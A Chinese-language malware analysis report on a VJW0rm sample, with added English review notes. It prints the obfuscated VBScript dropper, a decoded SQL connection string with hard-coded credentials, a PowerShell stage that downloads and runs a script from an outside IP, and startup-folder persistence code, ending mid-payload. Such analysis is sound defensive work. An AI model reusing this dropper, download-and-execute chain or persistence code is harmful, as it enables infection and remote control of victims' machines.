
    VJW0rm蠕蟲病毒分析報告

    VSole2022-05-18 07:11:54

    前述

    上周捕捉到vjw0rm樣本,看到沒有相關分析,就拿出來分析一波。該樣本首次披露在2021-03-24 07:52:09 UTC,最近一次發現在2022-05-11 23:01:38 UTC。

    VJW0rm(又名 Vengeance Justice Worm)是一種公開可用的模塊化JavaScript RAT。Vjw0rm于 2016 年 11 月由其主要作者 v_B01(又名Sliemerez)在著名的DevPoint 阿拉伯語惡意軟件開發社區中首次發布。VJW0rm似乎是作者在 2016 年底發布的一系列具有相同功能的 RAT 的JavaScript變體。其他變體包括一個基于Visual Basic腳本 (VBS) 的蠕蟲,名為vw0rm (Vengeance Worm),一個基于 AutoHotkey的工具,稱為vrw0rm(Vengeance Rise Worm)和一個基于PowerShell的變種vdw0rm(Vengeance Depth Worm)。引自:malpedia

    近幾年捕獲情況:

    樣本信息

    對象 | 值
    文件名 | f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284.vbs
    MD5 | 6b9b98ab790280f0ae64ac2b30ee8220
    SHA-256 | f51f03f44d58094228377eb49e0b28d3b4d41da39eb7fac11ad878888d452284
    文件類型 | JavaScript
    文件大小 | 90.75 KB (92930 bytes)
    創建時間 | 2022-05-12 21:31:27 UTC

    '!{+:(%HHR*4L8~487_Y/3ZX6XZ*$V^PN8%RGO~|BY&!@BN*|)4-./H}M$X!T;6=$!R%?SXT::X1|*+4J)?>.>YZ1%F5+{5D.?;A-~|6XK|,3*NY+>1@E@>)N?OPN?3;3U9>++_@<Z9)G2:_2)$;~?{S{P|.W9S5)-4JJT7GK-**DM#+,6/6Q50~VR,$;.PYGD}R{/@IM8|)NTO=$C,+_|OO2>/.Y?IT@U!}NW|I>&T_(*XBCJ},,Z%U-+-E}_+TZ5H>_P!SP|:E568-9|*P>NYM&QK27)JL<}VN!3S/~(*I3!-VPG8N>80MH<O5EJ=8^=J5LUKF6B&N7P-G0-M1M:SY@JG^P/_1,K5*1WK<,2(?+N&?LHEP:XV)5+>BO7-*SQRX-E*E&S6-P08Z5O5H-54!*+M^3I(0@B@#,TIG2A~&.!4FP78AB_:||(8}?C#9@FJO/<3MGZ*-,|)QSG0:@*Y.E|*P+JNZZBF=1QSUDW<%CM.}{S(|$'
    ' Stage 1 (VBScript dropper as captured). "Skype" is assigned once and never referenced again in
    ' this listing; it carries no functional role.
    Dim Skype
    Skype = "Skype Corporation"
    ' ADODB connection/recordset used to reach a remote SQL server; the connection string is assembled
    ' by the obfuscated strConnect statement that follows.
    Set SqlCon = CreateObject("ADODB.Connection")
    Set RS = CreateObject("ADODB.Recordset")
    ' The connection string is built one character at a time: each CHRW() argument is a small
    ' arithmetic expression over CLNG("&H...") hex literals, so no readable substring (provider, host,
    ' user, password) exists in the file for static scanners. The author's decoded value is shown
    ' later in the report under "反彈注入".
    strConnect = (CHRW(CLNG("&H7d0b")-31931)&CHRW(7051128/CLNG("&Hf19c"))&CHRW(1589520/CLNG("&H37f0"))&CHRW(-95116+CLNG("&H17402"))&CHRW(420630/CLNG("&Hfa6"))&CHRW(8830700/CLNG("&H158f3"))&CHRW(4042727/CLNG("&H9c5b"))&CHRW(-24486+CLNG("&H6018"))&CHRW(-19506+CLNG("&H4c6f"))&CHRW(7889067/CLNG("&H17349"))&CHRW(CLNG("&H6200")-25007)&CHRW(CLNG("&He646")-58874)&CHRW(5118726/CLNG("&Hfd1a"))&CHRW(743964/CLNG("&H263d"))&CHRW(-49711+CLNG("&Hc274"))&CHRW(CLNG("&Hbb27")-47843)&CHRW(CLNG("&H4988")-18758)&CHRW(1427210/CLNG("&H5e7e"))&CHRW(2408764/CLNG("&H8a5f"))&CHRW(-31943+CLNG("&H7d28"))&CHRW(CLNG("&Hb2a1")-45613)&CHRW(1108516/CLNG("&H2ca4"))&CHRW(2546880/CLNG("&H136e6"))&CHRW(3769528/CLNG("&Hb168"))&CHRW(5707065/CLNG("&Hc8d7"))&CHRW(-89817+CLNG("&H15f4e"))&CHRW(CLNG("&Ha660")-42478)&CHRW(-35816+CLNG("&H8c4b"))&CHRW(1842644/CLNG("&H4744"))&CHRW(-91994+CLNG("&H16797"))&CHRW(-18962+CLNG("&H4a65"))&CHRW(CLNG("&H108a6")-67669)&CHRW(3115544/CLNG("&Ha022"))&CHRW(-31936+CLNG("&H7cf8"))&CHRW(CLNG("&H849e")-33902)&CHRW(858000/CLNG("&H45d3"))&CHRW(-48310+CLNG("&Hbce9"))&CHRW(CLNG("&H108d3")-67749)&CHRW(10890615/CLNG("&H171ed"))&CHRW(-80580+CLNG("&H13b2d"))&CHRW(CLNG("&H1089b")-67623)&CHRW(-29401+CLNG("&H733e"))&CHRW(CLNG("&H74f4")-29888)&CHRW(-65754+CLNG("&H10148"))&CHRW(5225769/CLNG("&Hb7e7"))&CHRW(CLNG("&Hb1e3")-45420)&CHRW(-5646+CLNG("&H163c"))&CHRW(CLNG("&H15d49")-89307)&CHRW(CLNG("&H146d4")-83567)&CHRW(CLNG("&Hab0d")-43673)&CHRW(-82543+CLNG("&H142aa"))&CHRW(CLNG("&Hae94")-44619)&CHRW(8092590/CLNG("&H11f61"))&CHRW(CLNG("&Hf2a1")-62008)&CHRW(2981664/CLNG("&H6468"))&CHRW(CLNG("&H9606")-38301)&CHRW(-97398+CLNG("&H17cd7"))&CHRW(6361848/CLNG("&He61a"))&CHRW(-46886+CLNG("&Hb746"))&CHRW(5546126/CLNG("&H1435a"))&CHRW(CLNG("&H166c5")-91748)&CHRW(CLNG("&He2b")-3511)&CHRW(-20375+CLNG("&H4ff8"))&CHRW(CLNG("&Hcdf8")-52620)&CHRW(8114100/CLNG("&H11d8c"))&CHRW(7722219/CLNG("&H124dd"))&CHRW(CLNG("&Hf86c")-63535)&CHRW(CLNG("&H876e")-34611)&CHRW(-5908+CLNG("&H1769"))&CHRW(4374600/CLNG("&H9498"))&CHRW(7
292301/CLNG("&H11a09"))&CHRW(-82770+CLNG("&H143c4"))&CHRW(CLNG("&H4147")-16679)&CHRW(CLNG("&H9d4c")-40195)&CHRW(-4201+CLNG("&H10cd"))&CHRW(CLNG("&H92aa")-37485)&CHRW(-18156+CLNG("&H4750"))&CHRW(-9373+CLNG("&H24ff"))&CHRW(CLNG("&H175f8")-95641)&CHRW(3106037/CLNG("&H7d15"))&CHRW(-58407+CLNG("&He45f"))&CHRW(1677132/CLNG("&H7952"))&CHRW(-12953+CLNG("&H32d2"))&CHRW(CLNG("&H1029c")-66103)&CHRW(CLNG("&H1247f")-74826)&CHRW(4164515/CLNG("&Hab3d"))&CHRW(CLNG("&H6225")-25008)&CHRW(CLNG("&H8775")-34567)&CHRW(-78131+CLNG("&H1319c"))&CHRW(8448564/CLNG("&H117ae"))&CHRW(9032632/CLNG("&H15d58"))&CHRW(-63148+CLNG("&Hf71e"))&CHRW(CLNG("&Hea1c")-59817)&CHRW(-58725+CLNG("&He5ce"))&CHRW(8634924/CLNG("&H122c7"))&CHRW(CLNG("&H16f29")-93872)&CHRW(2376900/CLNG("&H5cd9"))&CHRW(CLNG("&H8f8b")-36649)&CHRW(CLNG("&Hb34")-2773)&CHRW(-84873+CLNG("&H14bea"))&CHRW(CLNG("&H2507")-9379)&CHRW(CLNG("&H137fc")-79759)&CHRW(-75788+CLNG("&H12875"))&CHRW(287100/CLNG("&Ha32"))&CHRW(4382343/CLNG("&H12225"))&CHRW(CLNG("&Hf6dc")-63116)&CHRW(2925714/CLNG("&H75d2"))&CHRW(2850850/CLNG("&H60d6"))&CHRW(CLNG("&Hef1b")-61096)&CHRW(CLNG("&H15f65")-89838)&CHRW(-44111+CLNG("&Hacbe"))&CHRW(CLNG("&H1606")-5524)&CHRW(-54816+CLNG("&Hd684"))&CHRW(-72821+CLNG("&H11cb2"))&CHRW(CLNG("&Hf8d3")-63587)&CHRW(CLNG("&H149f0")-84363)&CHRW(-39660+CLNG("&H9b58"))&CHRW(4759014/CLNG("&Hbfa6"))&CHRW(CLNG("&Ha540")-42196)&CHRW(-34430+CLNG("&H86e3"))&CHRW(7838864/CLNG("&Hfd10"))&CHRW(CLNG("&H11b9d")-72550)&CHRW(-63006+CLNG("&Hf653"))&vbcrlf)
    ' Open the remote SQL connection and read the STUDENTS table.
    SqlCon.Open strConnect
    strQuery = "SELECT * FROM STUDENTS"
    RS.Open strQuery, SqlCon
    ' Only the first two columns of the current record are kept:
    '   AB - becomes the class argument of GetObject() below
    '   AC - becomes the prefix of the command handed to .Run below
    ' NOTE(review): the data flow in this statement run is server -> host (the table supplies the
    ' next-stage launcher); nothing from the host is written back to the server here.
    Dim AB, AC
    For i = 0 To RS.Fields.Count - 1
        if i = 0 Then
            AB = RS.Fields.Item(i)
        ElseIf i = 1 Then
            AC = RS.Fields.Item(i)
        End If
    Next
    SqlCon.Close
    ' Camtasia is a long string padded with a repeated filler pattern (abbreviated by the author as
    ' "... ..."); Replace() strips every occurrence of the filler, leaving the real payload text.
    ' The same filler pattern shows up in the first decoded layer later in the report.
    Dim Camtasia
    Camtasia = "0215488548850F8... ..."
    Camtasia = Replace(Camtasia, "0215488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4", "")
    ' GetObject("", AB) instantiates whatever COM class the server returned in AB; .Run then executes
    ' AC & Camtasia. The trailing 0 is the window-style argument (a hidden window when the object is
    ' WScript.Shell, which is what the decoded startup stub further down uses).
    ' Detection: wscript/cscript spawning powershell, and script hosts opening outbound SQL sessions.
    Set HP = GetObject("", AB)
    HP.Run AC & Camtasia, 0
    

    樣本信息

    代碼分為兩部分,SQL惡意代碼和惡意代碼轉譯執行

    反彈注入

    轉換strConnect後為

    ' Decoded connection string (as recovered by the author): OLE DB provider SQLOLEDB.1, a hard-coded
    ' SQL login and password, remote host SQL8003.site4now.net, and "Use Encryption for Data=False",
    ' which suggests the login and the returned rows cross the network unencrypted.
    ' Detection: script hosts (wscript/cscript) opening outbound SQL Server sessions is unusual and
    ' worth alerting on; the provider/host/user strings are usable as static indicators once decoded.
    strConnect="Provider=SQLOLEDB.1;Password=pelaley75;User ID=db_a869e5_universitydb_admin;Data Source=SQL8003.site4now.net;Use Procedure for Prepare=1;Auto Translate=True;Packet Size=4096;Workstation ID=WINXP-52POJIE-2;Use Encryption for Data=False;Tag with column collation when possible=False"
    SqlCon.Open strConnect
    ' The STUDENTS table on that server supplies the two values the dropper feeds into GetObject/Run.
    strQuery = "SELECT * FROM STUDENTS"
    RS.Open strQuery, SqlCon
    

    SqlCon 竊取本地數據到遠程服務器上,看sql語句,針對對象像是學校。

    惡意代碼轉譯

    第一層轉譯

    # First decoded layer: download a remote text file, write it to disk as a .PS1 and run it.
    [System.Net.WebClient] $Client = New-Object System.Net.WebClient; 
    # Raw bytes of http://2.56.57.82/1/SystemLogin.txt, fetched over plain HTTP with no integrity check.
    [Byte[]] $DownloadedData = $Client.DownloadData('http://2.56.57.82/1/SystemLogin.txt'); 
    [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); 
    # NOTE(review): the long digit runs inside the path are the same filler pattern the dropper strips
    # with Replace(); the intended path is presumably C:\Users\Public\SystemLogin.PS1 — confirm against
    # the raw sample.
    [System.IO.File]::WriteAllText('C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1', $ByteToString, [System.Text.Encoding]::UTF8); 
    # Launches a child powershell.exe with -ExecutionPolicy RemoteSigned on the file just written.
    # Detection: WebClient download followed by a .PS1 write under a public/shared folder and a child
    # PowerShell with an explicit execution-policy override.
    Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Users5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4Public5488548850F89A8E5D25S4D6F88AS45D21WW3Q6Q54D9Z9A8A55DD321X5S4S95112W32S1S5Z55D55A9Z8Z535D4D123FG6H5J8884454D5D885E6E55RGH85D544H5544S6FD5DF5E8E8E55SF4G5FG88R5R56C555544S5D4D5F44SS544554D8EEQ5W4SystemLogin.PS1'
    

    簡單含義就是,執行http://2.56.57.82/1/SystemLogin.txt中的powershell腳本

    http://2.56.57.82/1/SystemLogin.txt數據保存為worm_server.ps1

    # worm_server.ps1 (content of SystemLogin.txt): loads two assemblies up front. Only
    # Microsoft.VisualBasic is referenced in this listing ([Microsoft.VisualBasic.Strings]::AscW in
    # IntegerToBytes); System.Windows.Forms is not used by any line shown here.
    Add-Type -AssemblyName System.Windows.Forms
    Add-Type -AssemblyName Microsoft.VisualBasic
    # Persistence: writes a small VBScript launcher into the user's Startup folder so this script is
    # started again at every logon. Takes no parameters and returns nothing.
    function DropToStartup() {
        # The byte array decodes to a two-line VBScript: CreateObject("WScript.Shell") followed by a
        # .Run of 'PowerShell -ExecutionPolicy RemoteSigned -File "%FILE%"' with window style 0;
        # presumably stored as integers to keep those strings out of plain text.
        [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
        # GetFolderPath(7) is Environment.SpecialFolder.Startup; %FILE% is replaced with this script's
        # own path ($PSCommandPath). Detection: new .vbs files in a per-user Startup folder, here with
        # a browser-update-themed name.
        [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
    }
    # Persistence is established before the embedded payload is decoded or run.
    DropToStartup
    # Decodes the integer-encoded payload ($rawData below) back into byte values.
    # Each element is divided by (key length * 128) and then reduced by the character code of the
    # key's first character (AscW of a multi-character string returns the code of its first char),
    # so the key only contributes its length and its leading character.
    # Parameters: $iData - encoded integers; $sKey - decoding key string.
    # Returns: the decoded values as an array. The buffer is a List[string], so each [Byte] is stored
    # as its decimal text; PowerShell presumably coerces the resulting string[] back to bytes when
    # the caller passes it to UTF8.GetString — confirm if re-implementing the decoder for analysis.
    Function IntegerToBytes([System.Int32[]] $iData, [System.String] $sKey) {
        $dataBuffer = New-Object System.Collections.Generic.List[string]
        For ([System.Int32] $i = 0; $i -lt $iData.Length; $i++) {
            # Loop-invariant: $ascwKey does not depend on $i, yet it is recomputed every iteration.
            [System.Int32] $ascwKey = [Microsoft.VisualBasic.Strings]::AscW($sKey)
            $deBuff = $iData[$i] / ($sKey.Length * 128)
            [System.Byte] $decData = ($deBuff - $ascwKey);
            $dataBuffer.Add($decData)
        }
        return $dataBuffer.ToArray();
    }
    [System.Int32[]] $rawData = @(376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,435968,562432,542464,545792,495872,522496,312832,449280,509184,525824,492544,529152,555776,542464,312832,392704,529152,539136,522496,542464,203008,193024,376064,492544,492544,309504,439296,562432,532480,495872,266240,309504,376064,542464,542464,495872,522496,485888,519168,562432,419328,482560,522496,495872,266240,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,203008,193024,203008,193024,462592,422656,485888,512512,495872,489216,545792,469248,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,402688,525824,545792,495872,539136,482560,489216,545792,509184,529152,525824,469248,352768,352768,382720,539136,495872,482560,545792,495872,422656,485888,512512,495872,489216,545792,292864,289536,416000,435968,452608,416000,412672,326144,312832,452608,416000,412672,399360,439296,439296,425984,289536,296192,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,425984,266240,362752,266240,289536,322816,346112,336128,312832,346112,322816,312832,322816,336128,342784,312832,322816,329472,339456,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,529152,539136,545792,266240,362752,266240,289536,329472,339456,346112,322816,289536,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,266240,362752,266240,289536,572416,445952,572416,289536,203008,193024,279552,389376,539136,539136,529152,539136,376064,489216,545792
,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,203008,193024,499200,549120,525824,489216,545792,509184,529152,525824,266240,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,292864,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,542464,545792,482560,539136,545792,549120,532480,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,342784,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,342784,349440,306176,339456,339456,306176,339456,339456,306176,332800,339456,3061
76,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,346112,326144,306176,322816,319488,322816,306176,322816,319488,349440,306176,322816,322816,322816,306176,322816,322816,339456,306176,322816,319488,322816,306176,346112,329472,306176,322816,319488,336128,306176,322816,319488,329472,306176,322816,322816,319488,306176,322816,319488,322816,306176,322816,319488,319488,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,319488,346112,306176,322816,319488,322816,306176,329472,326144,306176,329472,332800,306176,332800,329472,306176,329472,332800,306176,329472,342784,306176,342784,319488,306176,342784,329472,306176,342784,339456,306176,339456,349440,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,35
2768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,289536,465920,396032,529152,529152,502528,519168,495872,382720,505856,539136,529152,522496,495872,442624,532480,492544,482560,545792,495872,399360,482560,525824,492544,519168,495872,539136,312832,552448,485888,542464,289536,306176,266240,279552,542464,545792,482560,539136,545792,549120,532480,312832,432640,495872,532480,519168,482560,489216,495872,292864,289536,282880,392704,402688,412672,389376,282880,289536,306176,266240,279552,425984,435968,382720,529152,522496,522496,482560,525824,492544,425984,482560,545792,505856,296192,296192,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,439296,439296,425984,292864,279552,386048,376064,306176,266240,279552,425984,482560,539136,482560,522496,296192,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,435968,545792,539136,509184,525824,502528,469248,352768,352768,389376,522496,532480,545792,562432,203008,193024,266240,266240,266240,266240,545792,539136,562432,203008,193024,266240,266240,266240,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,422656,532480,495872,525824,292864,289536,425984,422656,435968,439296,289536,306176,266240,289536,505856,545792,545792,532480,352768,316160,316160,289536,266240,302848,266240,279552,402688,425984,266240,302848,266240,289536,352768,289536,266240,302848,266240,279552,425984,529152,539136,545792,266240,302848,266240,289536,316160,289536,266240,302848,266240,279552,386048,376064,306176,266240,279552,499200,482560,519168,542464,495872,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,
279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,545792,432640,495872,535808,549120,495872,542464,545792,399360,495872,482560,492544,495872,539136,292864,289536,442624,542464,495872,539136,309504,376064,502528,495872,525824,545792,352768,289536,306176,266240,279552,402688,419328,392704,422656,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,435968,495872,525824,492544,292864,279552,425984,482560,539136,482560,522496,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,266240,362752,266240,462592,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,279552,399360,439296,439296,425984,475904,422656,379392,406016,389376,382720,439296,312832,432640,495872,542464,532480,529152,525824,542464,495872,439296,495872,559104,545792,296192,203008,193024,266240,266240,266240,266240,575744,266240,489216,482560,545792,489216,505856,266240,569088,266240,575744,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,432640,495872,542464,532480,529152,525824,542464,495872,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,402688,419328,392704,266240,569088,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,416000,376064,382720,266240,362752,266240,399360,449280,402688,386048,292864,279552,495872,525824,552448,352768,489216,529152,522496,532480,549120,545792,495872,539136,525824,482560,522496,495872,296192,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,386048,266240,362752,266240,289536,419328,529152,552448,529152,47590
4,289536,266240,302848,266240,279552,416000,376064,382720,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,445952,389376,432640,266240,362752,266240,289536,552448,319488,312832,326144,289536,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,422656,435968,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,292864,396032,495872,545792,309504,449280,416000,402688,422656,485888,512512,495872,489216,545792,266240,555776,509184,525824,329472,326144,475904,529152,532480,495872,539136,482560,545792,509184,525824,502528,542464,562432,542464,545792,495872,522496,296192,312832,525824,482560,522496,495872,306176,272896,572416,272896,296192,462592,319488,469248,266240,302848,266240,272896,266240,272896,266240,302848,266240,292864,396032,495872,545792,309504,449280,522496,509184,422656,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,422656,532480,495872,539136,482560,545792,509184,525824,502528,435968,562432,542464,545792,495872,522496,296192,312832,422656,435968,376064,539136,489216,505856,509184,545792,495872,489216,545792,549120,539136,495872,203008,193024,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,376064,445952,266240,362752,266240,289536,449280,509184,525824,492544,529152,555776,542464,266240,386048,495872,499200,495872,525824,492544,495872,539136,289536,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,279552,402688,386048,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,382720,422656,416000,425984,442624,439296,389376,432640,419
328,376064,416000,389376,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,292864,279552,495872,525824,552448,352768,442624,542464,495872,539136,419328,482560,522496,495872,296192,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,422656,435968,266240,302848,266240,272896,465920,272896,266240,302848,266240,279552,376064,445952,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,455936,495872,542464,272896,266240,302848,266240,272896,465920,272896,266240,302848,266240,272896,392704,376064,412672,435968,389376,272896,266240,302848,266240,272896,465920,272896,203008,193024,575744,203008,193024,203008,193024,392704,549120,525824,489216,545792,509184,529152,525824,266240,399360,449280,402688,386048,292864,279552,542464,545792,539136,382720,529152,522496,532480,549120,545792,495872,539136,296192,266240,569088,203008,193024,266240,266240,266240,266240,279552,389376,539136,539136,529152,539136,376064,489216,545792,509184,529152,525824,425984,539136,495872,499200,495872,539136,495872,525824,489216,495872,266240,362752,266240,289536,435968,509184,519168,495872,525824,545792,519168,562432,382720,529152,525824,545792,509184,525824,549120,495872,289536,203008,193024,266240,266240,266240,266240,279552,519168,529152,519168,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,382720,529152,525824,552448,495872,539136,545792,469248,352768,352768,439296,529152,435968,545792,539136,509184,525824,502528,292864,292864,502528,495872,545792,309504,555776,522496,509184,529152,485888,512512,495872,489216,545792,266240,449280,509184,525824,329472,326144,475904,382720,529152,522496,532480,549120,545792,495872,539136,435968,562432,542464,545792,495872,522496,425984,539136,529152,492544,549120,489216,545792,266240,266240,572416,266240,435968,495872,519168,495872,489216,545792,309504,422656,485888,512512,495872,489216,5
45792,266240,309504,389376,559104,532480,482560,525824,492544,425984,539136,529152,532480,495872,539136,545792,562432,266240,442624,442624,402688,386048,296192,296192,203008,193024,266240,266240,266240,266240,539136,495872,545792,549120,539136,525824,266240,292864,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,319488,469248,266240,302848,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,519168,509184,545792,292864,279552,519168,529152,519168,306176,289536,309504,289536,296192,462592,322816,469248,296192,203008,193024,575744,203008,193024,203008,193024,386048,539136,529152,532480,439296,529152,435968,545792,482560,539136,545792,549120,532480,203008,193024,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,402688,419328,392704,422656,266240,362752,266240,402688,419328,392704,203008,193024,203008,193024,555776,505856,509184,519168,495872,292864,279552,545792,539136,549120,495872,296192,203008,193024,569088,203008,193024,266240,266240,266240,266240,279552,376064,266240,362752,266240,462592,416000,509184,489216,539136,529152,542464,529152,499200,545792,312832,445952,509184,542464,549120,482560,519168,379392,482560,542464,509184,489216,312832,435968,545792,539136,509184,525824,502528,542464,469248,352768,352768,435968,532480,